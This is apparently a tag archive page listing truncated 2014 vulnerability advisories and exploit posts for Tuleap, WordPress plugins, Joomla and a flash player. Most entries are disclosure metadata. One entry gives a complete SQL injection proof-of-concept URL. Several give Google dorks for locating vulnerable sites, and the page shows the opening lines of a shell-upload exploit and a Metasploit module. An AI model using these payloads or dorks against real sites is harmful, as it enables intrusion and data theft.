Tags archives: php

 

0

NuevoLabs flash player for clipshare SQL Injection

Nuevolabs Nuevoplayer for clipshare SQL Injection =======================================================================   :: ADVISORY SUMMARY :: Title: Nuevolabs Nuevoplayer for clipshare Sql Injection Vendor: NUEVOLABS (www.nuevolabs.com) Product: NUEVOPLAYER for clipshare Credits: Cory Marsh – protectlogic.com Discovery: 2014-10-10 Release: 2014-10-28   Nueovplayer is a popular flash video player with integration into multiple popular video sharing suites. The most notable is [...]

 

0

Tuleap 7.4.99.5 Remote Command Execution

Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap CVE: CVE-2014-7178 Vendor: Enalean Product: Tuleap Affected version: 7.4.99.5 and earlier Fixed version: 7.5 Reported by: Jerzy Kramarz   Details:   Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() [...]

 

0

Tuleap 7.2 XXE Injection

Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz   Details:   A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow [...]

 

0

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap CVE: CVE-2014-7176 Vendor: Enalean Product: Tuleap Affected version: 7.4.99.5 and earlier Fixed version: 7.5 Reported by: Jerzy Kramarz   Details:   SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker [...]

 

0

WordPress Download Manager Arbitrary File Download

# WordPress Download Manager Plugin – Arbitrary File Download # CWE: CWE-98 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 25/10/2014 # Vendor Homepage: https://wordpress.org/plugins/download-manager/ # Tested on: Windows 7 and Gnu/Linux # Google Dork: inurl:/plugins/download-manager/   # VUL: /views/file_download.php?fname=   or:   /file_download.php?fname=   # PoC :   [...]

 

0

WordPress HTML5 / Flash Player SQL Injection

# WordPress HTML5 and FLash PLayer Plugin SQL Injection # CWE: CWE-89 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 24/10/2014 # Vendor Homepage: https://wordpress.org/plugins/player/ # Tested on: Windows 7 and Gnu/Linux # Google Dork: inurl: “Index of” +inurl:/wp-content/plugins/player/   # PoC :   http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()– [...]

 

0

WordPress / Joomla Creative Contact Form 0.9.7 Shell Upload

#!/usr/bin/python # # Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability # Wordpress plugin version: <= 0.9.7 # Joomla extension version: <= 2.0.0 # # Vulnerability discovered by Gianni Angelozzi # # Exploit written by Claudio Viviani # # Dork google wordpress: inurl:inurl:sexy-contact-form # Dork google joomla : inurl:com_creativecontactform # # Tested [...]

 

0

WordPress CP Multi View Event Calendar 1.01 SQL Injection

######################   # Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability   # Exploit Author : Claudio Viviani   # Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip   # Date : 2014-10-23   # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap [...]

 

0

WordPress Database Manager 2.7.1 Command Injection / Credential Leak

Title: Vulnerabilities in WordPress Database Manager v2.7.1 Author: Larry W. Cashdollar, @_larry0 Date: 10/13/2014 Download: https://wordpress.org/plugins/wp-dbmanager/ Downloads: 1,171,358 Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/ Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2. Full Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html CVE: 2014-8334,2014-8335 OSVDBID: 113508,113507,113509   Description: “Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and [...]

 

0

Joomla Akeeba Kickstart Unserialize Remote Code Execution

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’ require ‘rex/zip’ require ‘json’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, ‘Name’ => “Joomla Akeeba Kickstart Unserialize Remote Code Execution”, ‘Description’ => %q{ This module exploits a vulnerability [...]